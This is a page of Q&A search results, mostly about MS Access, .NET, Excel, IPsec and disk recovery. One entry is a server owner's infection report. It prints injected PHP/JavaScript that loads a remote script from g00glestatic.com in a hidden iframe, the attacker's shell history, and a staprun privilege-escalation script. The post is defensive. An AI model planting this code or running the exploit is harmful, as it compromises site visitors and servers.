Search Results

Search found 19179 results on 768 pages for 'ms security essentials'.

  • "Too many indexes on table" error when creating relationships in Microsoft Access 2010.

    - by avianattackarmada
    I have tblUsers, which has a primary key of UserID. UserID is used as a foreign key in many tables, and within a single table it can serve as the foreign key for multiple fields (e.g. ObserverID, RecorderID, CheckerID). I have successfully added relationships (within the MS Access 'Relationship' view), using table aliases to create the multiple relationships per table:

        tblUser.UserID - 1 to many - tblResight.ObserverID
        tblUser_1.UserID - 1 to many - tblResight.CheckerID

    After creating about 25 relationships with referential integrity enforced, when I try to add one more I get the following error: "The operation failed. There are too many indexes on table 'tblUsers.' Delete some of the indexes on the table and try the operation again." I ran the code I found here and it returned that I have 6 indexes on tblUsers. I know there is a limit of 32 indexes per table. Am I using the relationship GUI wrong? Does Access create an index to enforce referential integrity every time I create a relationship (especially indexes that wouldn't turn up when I ran the script)? I'm kind of baffled; any help would be appreciated.
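    For anyone hitting the same wall: Jet/ACE does create a hidden index behind every relationship that enforces referential integrity, and those hidden indexes count toward the 32-index cap even though the table design view doesn't list them. A minimal C# sketch (file path and provider string are assumptions) that asks the engine itself for every index it holds on tblUsers:

        using System;
        using System.Data;
        using System.Data.OleDb;

        class ListIndexes
        {
            static void Main()
            {
                using (var conn = new OleDbConnection(
                    @"Provider=Microsoft.ACE.OLEDB.12.0;Data Source=C:\temp\mydb.accdb"))
                {
                    conn.Open();
                    // Restriction array for OleDbSchemaGuid.Indexes:
                    // catalog, schema, index name, type, table name.
                    DataTable indexes = conn.GetOleDbSchemaTable(
                        OleDbSchemaGuid.Indexes,
                        new object[] { null, null, null, null, "tblUsers" });
                    foreach (DataRow row in indexes.Rows)
                        Console.WriteLine("{0} (column {1})",
                            row["INDEX_NAME"], row["COLUMN_NAME"]);
                }
            }
        }

    Counting the rows this returns, rather than what the designer shows, gives the number the error message is actually complaining about.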

    Read the article

  • VB.NET Update Access Database with DataTable

    - by sinDizzy
    I've been perusing some help forums and help books but can't seem to get my head wrapped around this. My task is to read data from two text files and then load that data into an existing MS Access 2007 database. Here is what I'm trying to do: read data from the first text file and, for every line of data, add a row to a DataTable using CarID as my unique field; read data from the second text file and look for an existing CarID in the DataTable, updating that row if it exists and adding a new row if it doesn't; once I'm done, push the contents of the DataTable to the database. What I have so far:

        Dim sSQL As String = "SELECT * FROM tblCars"
        Dim da As New OleDb.OleDbDataAdapter(sSQL, conn)
        Dim ds As New DataSet
        da.Fill(ds, "CarData")
        Dim cb As New OleDb.OleDbCommandBuilder(da)
        'loop: read a line of text and parse it out. gets dd, dc, and carID
        'create a new empty row
        Dim dsNewRow As DataRow = ds.Tables("CarData").NewRow()
        'update the new row with fresh data
        dsNewRow.Item("DriveDate") = dd
        dsNewRow.Item("DCode") = dc
        dsNewRow.Item("CarNum") = carID
        'about 15 more fields
        'add the filled row to the DataSet table
        ds.Tables("CarData").Rows.Add(dsNewRow)
        'end loop
        'update the database with the new rows
        da.Update(ds, "CarData")

    Questions: In constructing my table I use "SELECT * FROM tblCars", but what if that table already holds millions of records; isn't that a waste of resources? Should I try something different if I only want to add new records? Once I'm done with the first text file I move on to the second. What's the best approach here: first look for an existing record based on CarNum, or build a second table and merge the two at the end? Finally, when the DataTable is fully populated and I push it to the database, I want records that already exist with the three key fields (DriveDate, DCode, and CarNum) to be updated with the new values, and records that don't exist to be appended. Is that possible with my process? tia AGP
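    One way to express the find-or-update-or-add step for the second file, sketched in C# (field and table names come from the question; CarNum is treated as the in-memory key):

        DataTable cars = ds.Tables["CarData"];
        cars.PrimaryKey = new DataColumn[] { cars.Columns["CarNum"] };

        DataRow row = cars.Rows.Find(carID);   // null when no row has this CarNum
        if (row == null)
        {
            row = cars.NewRow();
            row["CarNum"] = carID;
            cars.Rows.Add(row);
        }
        row["DriveDate"] = dd;                 // updates in place either way
        row["DCode"] = dc;

    Note that the adapter's Update only issues UPDATE statements for rows it originally loaded and marked Modified, and INSERTs for Added rows, so matching against records already in the database still requires filling the DataTable from the existing table (or a filtered subset of it) first.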

    Read the article

  • Selecting More Than 1 Table in A Single Query

    - by Kamran
    I have 5 tables in MS Access:

        Logs [Title, ID, Date, Author]
        Tape [Title, ID, Date, Author]
        Maps [Title, ID, Date, Author]
        VCDs [Title, ID, Date, Author]
        Book [Title, ID, Date, Author]

    I tried my level best with this code:

        SELECT Logs.[Author], Tape.[Author], Maps.[Author], VCDs.[Author], Book.[Author]
        FROM Logs, Tape, Maps, VCDs, Book
        WHERE ((([Author] & " " & [Author] & " " & [Author] & " " & [Author] & " " & [Author])
            Like "*" & [Type the Title or Any Part of the Title and Press Ok] & "*"));

    I want to select all of these fields in a single query. Suppose Adam appears as an author of works in all five tables; when I put Adam in the search box, it should return results from all of them. I know this could be done by using a single table or by renaming the fields, but that's not an option here. Please help.
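    The usual shape of a solution is a UNION query rather than a five-table cross join. A hedged C# sketch follows (table and field names come from the question; searching on Author matches the Adam example, though the prompt text mentions Title; conn is an open OleDbConnection):

        string pattern = "%" + searchText + "%";   // % instead of * via OleDb
        string sql =
            "SELECT Title, ID, [Date], Author, 'Logs' AS Source FROM Logs WHERE Author LIKE ? " +
            "UNION ALL SELECT Title, ID, [Date], Author, 'Tape' FROM Tape WHERE Author LIKE ? " +
            "UNION ALL SELECT Title, ID, [Date], Author, 'Maps' FROM Maps WHERE Author LIKE ? " +
            "UNION ALL SELECT Title, ID, [Date], Author, 'VCDs' FROM VCDs WHERE Author LIKE ? " +
            "UNION ALL SELECT Title, ID, [Date], Author, 'Book' FROM Book WHERE Author LIKE ?";

        using (var cmd = new OleDbCommand(sql, conn))
        {
            for (int i = 0; i < 5; i++)                 // OleDb parameters are positional
                cmd.Parameters.AddWithValue("?", pattern);
            using (OleDbDataReader r = cmd.ExecuteReader())
                while (r.Read())
                    Console.WriteLine("{0}: {1} by {2}", r["Source"], r["Title"], r["Author"]);
        }

    The same SQL, with * wildcards instead of %, can be saved directly as a union query in the Access SQL view.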

    Read the article

  • How to close and open access to SQL Server 2008 in Windows application?

    - by hgulyan
    Hi, I have an MS Access 97 application (but the question is general) working directly with SQL Server 2008 (no application server or anything in between). There can be up to 1000 users, and Windows Authentication is used. The question is: how do I handle modes, so that

    * some users are allowed to work only in read-only mode, and
    * some users have no access to the DB at all for some period of time?

    My ideas so far:

    * Use a table holding a mode id for every group of users. On Form Load the application queries that table for the mode id.
    * Use triggers on the tables that must honor the mode. The trigger queries the mode value and rejects the operation if access is closed or the group is in read-only mode.

    I know these are not the best solutions, which is why I'm asking for your advice. There's one more point: if the mode is changed to "access is closed" for a group of users, that group must be unable to query the DB from that moment on. With the first solution this won't work, because a user can already be inside the application at that moment, so no Form Load event will fire. How can I do this? Is there an optimal solution? Thank you; any help would be appreciated.
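    One hedged sketch of a per-operation check (the question is general, so C# stands in for the client; table, column, and variable names are invented): look the group's mode up immediately before each write instead of only on Form Load, so a mode change takes effect mid-session:

        const int ModeReadOnly = 1, ModeClosed = 2;

        using (var cmd = new SqlCommand(
            "SELECT ModeId FROM dbo.GroupModes WHERE GroupId = @g", conn))
        {
            cmd.Parameters.AddWithValue("@g", groupId);
            int mode = (int)cmd.ExecuteScalar();
            if (mode == ModeClosed)
                throw new InvalidOperationException("Access is currently closed.");
            if (mode == ModeReadOnly && isWriteOperation)
                throw new InvalidOperationException("Read-only mode is in effect.");
        }

    A client-side check alone can be bypassed, so server-side enforcement (revoking permissions for the group's Windows group, or the trigger approach from the question) is still needed for users who are already connected.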

    Read the article

  • C# and Excel best practices

    - by rlp
    I am doing a lot of MS Excel interop in C# (Visual Studio 2012) using Microsoft.Office.Interop.Excel. It requires a lot of tiresome manual code to insert Excel formulas, format text and numbers, and make graphs. I would very much appreciate input on how to do this better. I have been looking at Visual Studio Tools for Office, but I am uncertain about its capabilities: I gather it is required for building Excel add-ins, but does it help with Excel automation? I have been trying hard to find information on working with Excel from Visual Studio 2012 using C#. I found some good but short tutorials; however, I would really like a book on the subject to learn the field more in depth regarding functionality and best practices. Searching Amazon with my limited knowledge only turns up books on VSTO for older versions of Visual Studio. I would prefer not to use VBA. My applications use Excel mainly for visualizing data compiled from different sources; I also do data processing where Excel is not required. Furthermore, I can write C# but not VB.
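    For reference, the kind of cell-by-cell interop boilerplate the question describes looks roughly like this (a minimal sketch; the output path is hypothetical, and proper COM-object release and error handling are omitted for brevity):

        using Excel = Microsoft.Office.Interop.Excel;

        var app = new Excel.Application();
        var wb = app.Workbooks.Add();
        var ws = (Excel.Worksheet)wb.Worksheets[1];

        ws.Cells[1, 1] = 42;                          // raw values
        ws.Cells[2, 1] = 58;
        var total = (Excel.Range)ws.Cells[3, 1];
        total.Formula = "=SUM(A1:A2)";                // a formula
        total.NumberFormat = "#,##0.00";              // number formatting
        total.Font.Bold = true;                       // text formatting

        wb.SaveAs(@"C:\temp\report.xlsx");            // hypothetical path
        app.Quit();

    Libraries that write the .xlsx file format directly, rather than automating a running Excel instance, can remove much of this ceremony when Excel itself doesn't need to be open; interop remains the route when live workbooks or charts must be driven in-place.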

    Read the article

  • Batch Inserts And Prepared Query Error

    - by ircmaxell
    Ok, so I need to populate an MS Access database table with results from a MySQL query. That's not hard at all. I've got the program written to the point where it copies a template .mdb file to a temp name and opens it via ODBC. No problem so far. I've noticed that Access does not support batch inserting (VALUES (foo, bar), (second, row), (third, row)). That means I need to execute one query per row, and there are potentially hundreds of thousands of rows. Initial performance tests show a rate of around 900 inserts/sec into Access. With our largest data sets, that could mean execution times of several minutes (which isn't the end of the world, but obviously the faster the better). So I tried testing a prepared statement, but I keep getting an error:

        Warning: odbc_execute() [function.odbc-execute]: SQL error: [Microsoft][ODBC Microsoft Access Driver]COUNT field incorrect, SQL state 07001 in SQLExecute in D:\....php on line 30

    Here's the code I'm using (line 30 is the odbc_execute call):

        $sql = 'INSERT INTO table ([field0], [field1], [field2], [field3], [field4], [field5])
                VALUES (?, ?, ?, ?, ?, ?)';
        $stmt = odbc_prepare($conn, $sql);
        for ($i = 200001; $i < 300001; $i++) {
            $a = array($i, "Field1 $", "Field2 $i", "Field3 $i", "Field4 $i", $i);
            odbc_execute($stmt, $a);
        }

    So my question is twofold. First, any idea why I'm getting that error? (I've checked, and the number of elements in the array matches the field list, which matches the number of ? parameter markers.) And second, should I even bother with this, or just use straight INSERT statements? Like I said, time isn't critical, but if possible I'd like to get it as low as possible (then again, I may be limited by disk throughput, since 900 operations/sec is already high)... Thanks

    Read the article

  • OpenSwan IPSec phase #2 complications

    - by XXL
    Phase #1 (IKE) succeeds without any problems (verified at the target host). Phase #2 (IPSec), however, fails at some point, apparently due to a misconfiguration on localhost. This should be an IPSec-only connection. I am using OpenSwan on Debian. The error log reads as follows (the actual IP address of the remote endpoint has been modified):

        pluto[30868]: "x" #2: initiating Quick Mode PSK+ENCRYPT+PFS+UP+IKEv2ALLOW+SAREFTRACK {using isakmp#1 msgid:5ece82ee proposal=AES(12)_256-SHA1(2)_160 pfsgroup=OAKLEY_GROUP_DH22}
        pluto[30868]: "x" #1: ignoring informational payload, type NO_PROPOSAL_CHOSEN msgid=00000000
        pluto[30868]: "x" #1: received and ignored informational message
        pluto[30868]: "x" #1: the peer proposed: 0.0.0.0/0:0/0 - 0.0.0.0/0:0/0
        pluto[30868]: "x" #3: responding to Quick Mode proposal {msgid:a4f5a81c}
        pluto[30868]: "x" #3: us: 192.168.1.76<192.168.1.76[+S=C]
        pluto[30868]: "x" #3: them: 222.222.222.222<222.222.222.222[+S=C]===10.196.0.0/17
        pluto[30868]: "x" #3: transition from state STATE_QUICK_R0 to state STATE_QUICK_R1
        pluto[30868]: "x" #3: STATE_QUICK_R1: sent QR1, inbound IPsec SA installed, expecting QI2
        pluto[30868]: "x" #1: ignoring informational payload, type NO_PROPOSAL_CHOSEN msgid=00000000
        pluto[30868]: "x" #1: received and ignored informational message
        pluto[30868]: "x" #3: next payload type of ISAKMP Hash Payload has an unknown value: 97 X
        pluto[30868]: "x" #3: malformed payload in packet
        pluto[30868]: | payload malformed after IV

    I am behind NAT and this is all coming from wlan2. Here are the routing details:

        default via 192.168.1.254 dev wlan2 proto static
        169.254.0.0/16 dev wlan2 scope link metric 1000
        192.168.1.0/24 dev wlan2 proto kernel scope link src 192.168.1.76 metric 2

    Output of ipsec verify:

        Checking your system to see if IPsec got installed and started correctly:
        Version check and ipsec on-path                       [OK]
        Linux Openswan U2.6.37/K3.2.0-24-generic (netkey)
        Checking for IPsec support in kernel                  [OK]
        SAref kernel support                                  [N/A]
        NETKEY: Testing XFRM related proc values              [OK] [OK] [OK]
        Checking that pluto is running                        [OK]
        Pluto listening for IKE on udp 500                    [OK]
        Pluto listening for NAT-T on udp 4500                 [OK]
        Two or more interfaces found, checking IP forwarding  [OK]
        Checking NAT and MASQUERADEing                        [OK]
        Checking for 'ip' command                             [OK]
        Checking /bin/sh is not /bin/dash                     [WARNING]
        Checking for 'iptables' command                       [OK]
        Opportunistic Encryption Support                      [DISABLED]

    This is what happens when I run ipsec auto --up x:

        104 "x" #1: STATE_MAIN_I1: initiate
        003 "x" #1: received Vendor ID payload [RFC 3947] method set to=109
        106 "x" #1: STATE_MAIN_I2: sent MI2, expecting MR2
        003 "x" #1: received Vendor ID payload [Cisco-Unity]
        003 "x" #1: received Vendor ID payload [Dead Peer Detection]
        003 "x" #1: ignoring unknown Vendor ID payload [502099ff84bd4373039074cf56649aad]
        003 "x" #1: received Vendor ID payload [XAUTH]
        003 "x" #1: NAT-Traversal: Result using RFC 3947 (NAT-Traversal): i am NATed
        108 "x" #1: STATE_MAIN_I3: sent MI3, expecting MR3
        004 "x" #1: STATE_MAIN_I4: ISAKMP SA established {auth=OAKLEY_PRESHARED_KEY cipher=aes_128 prf=oakley_sha group=modp1024}
        117 "x" #2: STATE_QUICK_I1: initiate
        010 "x" #2: STATE_QUICK_I1: retransmission; will wait 20s for response
        010 "x" #2: STATE_QUICK_I1: retransmission; will wait 40s for response
        031 "x" #2: max number of retransmissions (2) reached STATE_QUICK_I1.  No acceptable response to our first Quick Mode message: perhaps peer likes no proposal
        000 "x" #2: starting keying attempt 2 of at most 3, but releasing whack

    I have enabled NAT traversal in ipsec.conf accordingly. Here are the settings relevant to the connection in question:

        version 2.0
        config setup
            plutoopts="--perpeerlog"
            plutoopts="--interface=wlan2"
            dumpdir=/var/run/pluto/
            nat_traversal=yes
            virtual_private=%v4:10.0.0.0/8,%v4:192.168.0.0/16,%v4:172.16.0.0/12
            oe=off
            protostack=netkey

        conn x
            authby=secret
            pfs=yes
            auto=add
            phase2alg=aes256-sha1;dh22
            keyingtries=3
            ikelifetime=8h
            type=transport
            left=192.168.1.76
            leftsubnet=192.168.1.0/24
            leftprotoport=0/0
            right=222.222.222.222
            rightsubnet=10.196.0.0/17
            rightprotoport=0/0

    Here are the specs provided by the other end that must be met for Phase #2:

        encryption algorithm: AES (128 or 256 bit)
        hash algorithm: SHA
        local ident1 (addr/mask/prot/port): (10.196.0.0/255.255.128.0/0/0)
        local ident2 (addr/mask/prot/port): (10.241.0.0/255.255.0.0/0/0)
        remote ident (addr/mask/prot/port): (x.x.x.x/x.x.x.x/0/0) (internal network or localhost)
        Security association lifetime: 4608000 kilobytes/3600 seconds
        PFS: DH group2

    So, finally, what might be the cause of the issue I am experiencing? Thank you.

    Read the article

  • Mass targeted malware installed - g00glestatic.com [closed]

    - by Silver89
    Possible Duplicate: My server’s been hacked EMERGENCY

    I run a webserver which over the last few days seems to have become infected with malware that tries to include content from "http://g00glestatic.com/s.js". It appears the attacker gained access to one of the user accounts (not root), made a few changes, added a few files, and ran a few bash commands. These changes stuck out clearly to me because it is not a shared server and I am the only person with access, through very secure passwords.

    The PHP/JavaScript code that was added. To .php files, this code was added:

        #9c282e# if(!$srvc_counter) { echo "<script type=\"text/javascript\" src=\"http://g00glestatic.com/s.js\"></script>"; $srvc_counter = true;} #/9c282e#

    To .js files, this code was added:

        /*9c282e*/
        var _f = document.createElement('iframe'),_r = 'setAttribute';
        _f[_r]('src', 'http://g00glestatic.com/s.js');
        _f.style.position = 'absolute';_f.style.width = '10px';
        _f[_r]('frameborder', navigator.userAgent.indexOf('bf3f1f8686832c30d7c764265f8e7ce8') + 1);
        _f.style.left = '-5540px';
        document.write('<div id=\'MIX_ADS\'></div>');
        document.getElementById('MIX_ADS').appendChild(_f);
        /*/9c282e*/

    The bash commands taken from .bash_history (some usernames/passwords have been subbed):

        su -c id $replacedPassword id; id; sudo id; replacedPassword id;
        cd /home/replacedUserId1; chmod +x .sess_28e2f1bc755ed3ca48b32fbcb55b91a7; ./.sess_28e2f1bc755ed3ca48b32fbcb55b91a7; rm /home/replacedUserId1/.sess_28e2f1bc755ed3ca48b32fbcb55b91a7; id;
        cd /home/replacedUserId1; chmod +x .sess_05ee5257fed0ac8e0f12096f4c3c0d20; ./.sess_05ee5257fed0ac8e0f12096f4c3c0d20; rm /home/replacedUserId1/.sess_05ee5257fed0ac8e0f12096f4c3c0d20; id;
        cd /home/replacedUserId1; chmod +x .sess_bfa542fc2578cce68eb373782c5689b9; ./.sess_bfa542fc2578cce68eb373782c5689b9; rm /home/replacedUserId1/.sess_bfa542fc2578cce68eb373782c5689b9; id;
        cd /home/replacedUserId1; chmod +x .sess_bfa542fc2578cce68eb373782c5689b9; ./.sess_bfa542fc2578cce68eb373782c5689b9; rm /home/replacedUserId1/.sess_bfa542fc2578cce68eb373782c5689b9; id;
        cd /home/replacedUserId1; chmod +x .sess_fb19dfb52ed4a3ae810cd4454ac6ef1e; ./.sess_fb19dfb52ed4a3ae810cd4454ac6ef1e; rm /home/replacedUserId1/.sess_fb19dfb52ed4a3ae810cd4454ac6ef1e; id;
        kill -9 $$;; kill -9 $$;; kill -9 $$;

    The above seems to move files added to the public_html to the level above? I also have all 4 of the files that were added:

        .sess_28e2f1bc755ed3ca48b32fbcb55b91a7
        .sess_05ee5257fed0ac8e0f12096f4c3c0d20
        .sess_bfa542fc2578cce68eb373782c5689b9
        .sess_fb19dfb52ed4a3ae810cd4454ac6ef1e

    Of those four files, three are not viewable in Notepad++ and display null characters, whereas .sess_fb19dfb52ed4a3ae810cd4454ac6ef1e consists of:

        #!/bin/sh
        export PATH=$PATH:/sbin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/bin;
        export LC_ALL=en_US.UTF-8 LC_COLLATE=en_US.UTF-8 LC_CTYPE=en_US.UTF-8 LANG=en_US.UTF-8 LANGUAGE=en_US.UTF-8
        export TERM=linux
        echo -n "-> checking staprun: ";
        if which staprun 2>&1 | grep -q "no $1"; then
            flag=1
        elif [ -z "`which $1 2>&1`" ]; then
            flag=1;
        fi
        if [ "$flag" = "1" ]; then
            echo "no staprun, exiting";
            exit;
        else
            echo "found";
            echo "-> trying to exploit...";
            printf "install uprobes /bin/sh" > ololo.conf;
            MODPROBE_OPTIONS="-C ololo.conf" staprun -u ololo
            rm -f ololo.conf
        fi

    Other noticeable edits: any files matching ([.htaccess]|[index|header|footer].php|[*.js]) will have been modified, and all system file and directory permissions will have been changed to x--x--x.

    My steps to remove this malware:

    * Re-uploaded the original php/js files to revert any changes
    * Changed all user passwords
    * Modified hosts.allow to a static IP so that only I have access
    * Removed the above 4 files and checked all modified file dates within that directory for any other recent modifications; none can be found

    Conclusion: I'm hoping that, as they did not have root access, any changes they wished to make higher up failed, and they were only able to display an iframe on the site for a short amount of time? What else do I need to look for to check that the malware infection has not spread?

    Second conclusion: This malware sinks too deep to 'clean'; if you get infected I recommend a server nuke and a rebuild from backups with increased security.

    Possibility: It's possible that FileZilla FTP passwords were stolen through a trojan, as they're unfortunately stored unencrypted; however, Trend Micro Titanium has not found one. The settings box to disable saving passwords has now been ticked, and I recommend you take this action too.

    Read the article

  • Need help with testdisk output

    - by dan
    I had (note the past tense) an Ubuntu 12.04 system with separate partitions for the base and /home directories. It started acting wonky, so I decided to do a reinstall with 12.10, intending to reinstall only the base partition. After several seconds I realized that the installer was repartitioning the drive and reinstalling, so I pulled the power cord. I'm now trying to recover as much as I can with testdisk, but it finds about 100 unique partitions when I run it - they mostly tend to be HFS+ or Solaris /home (which I think is just an ext4; I've never had Solaris on the machine). I've pasted an abbreviated version of the testdisk output below (the first ~100 lines, and then ~100 lines from the middle of the output). Is there a way to combine or recreate the partitions and then do data recovery, or some other way to maximize what I can recover (ideally as much of the file system as possible)? I really only care about what was in the /home directory - I'd rather not use photorec, since I don't have another 2 TB HD lying around to recover to. Thanks, Dan

        Mon Dec 10 06:03:00 2012
        Command line: TestDisk

        TestDisk 6.13, Data Recovery Utility, November 2011
        Christophe GRENIER <[email protected]>
        http://www.cgsecurity.org
        OS: Linux, kernel 3.2.34-std312-amd64 (#2 SMP Sat Nov 17 08:06:32 UTC 2012) x86_64
        Compiler: GCC 4.4
        Compilation date: 2012-11-27T22:44:52
        ext2fs lib: 1.42.6, ntfs lib: libntfs-3g, reiserfs lib: 0.3.1-rc8, ewf lib: none
        /dev/sda: LBA, HPA, LBA48, DCO support
        /dev/sda: size       3907029168 sectors
        /dev/sda: user_max   3907029168 sectors
        /dev/sda: native_max 3907029168 sectors
        Warning: can't get size for Disk /dev/mapper/control - 0 B - CHS 1 1 1, sector size=512
        /dev/sr0 is not an ATA disk
        Hard disk list
        Disk /dev/sda - 2000 GB / 1863 GiB - CHS 243201 255 63, sector size=512 - WDC WD20EARS-00J2GB0, S/N:WD-WCAYY0075071, FW:80.00A80
        Disk /dev/sdb - 1013 MB / 967 MiB - CHS 1014 32 61, sector size=512 - Generic Flash Disk, FW:8.07
        Disk /dev/sr0 - 367 MB / 350 MiB - CHS 179470 1 1 (RO), sector size=2048 - PLDS DVD+/-RW DH-16AAS, FW:JD12
        Partition table type (auto): Intel
        Disk /dev/sda - 2000 GB / 1863 GiB - WDC WD20EARS-00J2GB0
        Partition table type: EFI GPT
        Analyse Disk /dev/sda - 2000 GB / 1863 GiB - CHS 243201 255 63
        Current partition structure:
        Bad GPT partition, invalid signature.
search_part() Disk /dev/sda - 2000 GB / 1863 GiB - CHS 243201 255 63 recover_EXT2: s_block_group_nr=0/14880, s_mnt_count=5/4294967295, s_blocks_per_group=32768, s_inodes_per_group=8192 recover_EXT2: s_blocksize=4096 recover_EXT2: s_blocks_count 487593984 recover_EXT2: part_size 3900751872 MS Data 2048 3900753919 3900751872 EXT4 Large file Sparse superblock, 1997 GB / 1860 GiB Linux Swap 3900755968 3907028975 6273008 SWAP2 version 1, 3211 MB / 3062 MiB Results P MS Data 2048 3900753919 3900751872 EXT4 Large file Sparse superblock, 1997 GB / 1860 GiB P Linux Swap 3900755968 3907028975 6273008 SWAP2 version 1, 3211 MB / 3062 MiB interface_write() 1 P MS Data 2048 3900753919 3900751872 2 P Linux Swap 3900755968 3907028975 6273008 search_part() Disk /dev/sda - 2000 GB / 1863 GiB - CHS 243201 255 63 recover_EXT2: s_block_group_nr=0/14880, s_mnt_count=5/4294967295, s_blocks_per_group=32768, s_inodes_per_group=8192 recover_EXT2: s_blocksize=4096 recover_EXT2: s_blocks_count 487593984 recover_EXT2: part_size 3900751872 MS Data 2048 3900753919 3900751872 EXT4 Large file Sparse superblock, 1997 GB / 1860 GiB block_group_nr 1 recover_EXT2: "e2fsck -b 32768 -B 4096 device" may be needed recover_EXT2: s_block_group_nr=1/14880, s_mnt_count=0/4294967295, s_blocks_per_group=32768, s_inodes_per_group=8192 recover_EXT2: s_blocksize=4096 recover_EXT2: s_blocks_count 487593984 recover_EXT2: part_size 3900751872 MS Data 2046 3900753917 3900751872 EXT4 Large file Sparse superblock Backup superblock, 1997 GB / 1860 GiB block_group_nr 1 recover_EXT2: "e2fsck -b 32768 -B 4096 device" may be needed recover_EXT2: s_block_group_nr=1/14880, s_mnt_count=0/4294967295, s_blocks_per_group=32768, s_inodes_per_group=8192 recover_EXT2: s_blocksize=4096 recover_EXT2: s_blocks_count 487593984 recover_EXT2: part_size 3900751872 MS Data 2048 3900753919 3900751872 EXT4 Large file Sparse superblock Backup superblock, 1997 GB / 1860 GiB block_group_nr 1 recover_EXT2: "e2fsck -b 32768 -B 4096 device" may be needed recover_EXT2: s_block_group_nr=1/14584, s_mnt_count=0/27, s_blocks_per_group=32768, s_inodes_per_group=8192 recover_EXT2: s_blocksize=4096 recover_EXT2: s_blocks_count 477915164 recover_EXT2: part_size 3823321312 MS Data 4094 3823325405 3823321312 EXT4 Large file Sparse superblock Backup superblock, 1957 GB / 1823 GiB block_group_nr 1 ....snip...... 
MS Data 2046 3900753917 3900751872 EXT4 Large file Sparse superblock Backup superblock, 1997 GB / 1860 GiB MS Data 2048 3900753919 3900751872 EXT4 Large file Sparse superblock, 1997 GB / 1860 GiB MS Data 4094 3823325405 3823321312 EXT4 Large file Sparse superblock Backup superblock, 1957 GB / 1823 GiB MS Data 4096 3823325407 3823321312 EXT4 Large file Sparse superblock Backup superblock, 1957 GB / 1823 GiB MS Data 7028840 7033383 4544 FAT12, 2326 KB / 2272 KiB Mac HFS 67856948 67862179 5232 HFS+ found using backup sector!, 2678 KB / 2616 KiB Mac HFS 67862176 67867407 5232 HFS+, 2678 KB / 2616 KiB Mac HFS 67862244 67867475 5232 HFS+ found using backup sector!, 2678 KB / 2616 KiB Mac HFS 67867404 67872635 5232 HFS+, 2678 KB / 2616 KiB Mac HFS 67867472 67872703 5232 HFS+, 2678 KB / 2616 KiB Mac HFS 67872700 67877931 5232 HFS+, 2678 KB / 2616 KiB Mac HFS 67937834 67948067 10234 [EasyInstall_OSX] HFS found using backup sector!, 5239 KB / 5117 KiB Mac HFS 67938012 67948155 10144 HFS+ found using backup sector!, 5193 KB / 5072 KiB Mac HFS 67948064 67958297 10234 [EasyInstall_OSX] HFS, 5239 KB / 5117 KiB Mac HFS 67948070 67958303 10234 [EasyInstall_OSX] HFS found using backup sector!, 5239 KB / 5117 KiB Mac HFS 67948152 67958295 10144 HFS+, 5193 KB / 5072 KiB Mac HFS 67958292 67968435 10144 HFS+, 5193 KB / 5072 KiB Mac HFS 67958300 67968533 10234 [EasyInstall_OSX] HFS, 5239 KB / 5117 KiB Mac HFS 67992596 67997827 5232 HFS+ found using backup sector!, 2678 KB / 2616 KiB Mac HFS 67997824 68003055 5232 HFS+, 2678 KB / 2616 KiB Mac HFS 67997892 68003123 5232 HFS+ found using backup sector!, 2678 KB / 2616 KiB Mac HFS 68003052 68008283 5232 HFS+, 2678 KB / 2616 KiB Mac HFS 68003120 68008351 5232 HFS+, 2678 KB / 2616 KiB Mac HFS 68008348 68013579 5232 HFS+, 2678 KB / 2616 KiB Solaris /home 84429840 123499141 39069302 UFS1, 20 GB / 18 GiB Solaris /home 84429952 123499253 39069302 UFS1, 20 GB / 18 GiB Solaris /home 84493136 123562437 39069302 UFS1, 20 GB / 18 GiB Solaris /home 84493248 123562549 39069302 UFS1, 20 GB / 18 GiB Solaris /home 84566088 123635389 39069302 UFS1, 20 GB / 18 GiB Solaris /home 84566200 123635501 39069302 UFS1, 20 GB / 18 GiB Solaris /home 84571232 123640533 39069302 UFS1, 20 GB / 18 GiB Solaris /home 84571344 123640645 39069302 UFS1, 20 GB / 18 GiB Solaris /home 84659952 123729253 39069302 UFS1, 20 GB / 18 GiB Solaris /home 84660064 123729365 39069302 UFS1, 20 GB / 18 GiB Solaris /home 84690504 123759805 39069302 UFS1, 20 GB / 18 GiB Solaris /home 84690616 123759917 39069302 UFS1, 20 GB / 18 GiB Solaris /home 84700424 123769725 39069302 UFS1, 20 GB / 18 GiB Solaris /home 84700536 123769837 39069302 UFS1, 20 GB / 18 GiB Solaris /home 84797720 123867021 39069302 UFS1, 20 GB / 18 GiB Solaris /home 84797832 123867133 39069302 UFS1, 20 GB / 18 GiB Solaris /home 84812544 123881845 39069302 UFS1, 20 GB / 18 GiB Solaris /home 84812656 123881957 39069302 UFS1, 20 GB / 18 GiB Solaris /home 84824552 123893853 39069302 UFS1, 20 GB / 18 GiB Solaris /home 84824664 123893965 39069302 UFS1, 20 GB / 18 GiB Solaris /home 84847528 123916829 39069302 UFS1, 20 GB / 18 GiB Solaris /home 84847640 123916941 39069302 UFS1, 20 GB / 18 GiB Solaris /home 84886840 123956141 39069302 UFS1, 20 GB / 18 GiB Solaris /home 84886952 123956253 39069302 UFS1, 20 GB / 18 GiB Solaris /home 84945488 124014789 39069302 UFS1, 20 GB / 18 GiB Solaris /home 84945600 124014901 39069302 UFS1, 20 GB / 18 GiB Solaris /home 84957992 124027293 39069302 UFS1, 20 GB / 18 GiB Solaris /home 84958104 124027405 39069302 UFS1, 20 GB / 18 
GiB Solaris /home 84962240 124031541 39069302 UFS1, 20 GB / 18 GiB Solaris /home 84962352 124031653 39069302 UFS1, 20 GB / 18 GiB Solaris /home 84977168 124046469 39069302 UFS1, 20 GB / 18 GiB Solaris /home 84977280 124046581 39069302 UFS1, 20 GB / 18 GiB MS Data 174395467 178483851 4088385 ..... snip (it keeps going on for quite a while)

    Read the article

  • Installing VSTO 4.0 Causes VSTO 3.0 Addin to quit working

    - by Jacob Adams
    I just installed Visual Studio 2010 yesterday, and as part of that I installed VSTO 4.0. Now when I run any Office application, my VSTO 3.0 add-ins fail to load. The error in the event log is:

        Customization URI: file:///H:/PathToMyAddin/MyAddin.vsto
        Exception: Customization does not have the permissions required to create an application domain.

        ***** Exception Text *****
        Microsoft.VisualStudio.Tools.Applications.Runtime.CannotCreateCustomizationDomainException:
        Customization does not have the permissions required to create an application domain.
        ---> System.Security.SecurityException: Customized functionality in this application will not
        work because the administrator has listed file:///H:/PathToMyAddin/MyAddin.vsto as untrusted.
        Contact your administrator for further assistance.
           at Microsoft.VisualStudio.Tools.Office.Runtime.RuntimeUtilities.VerifySolutionUri(Uri uri)
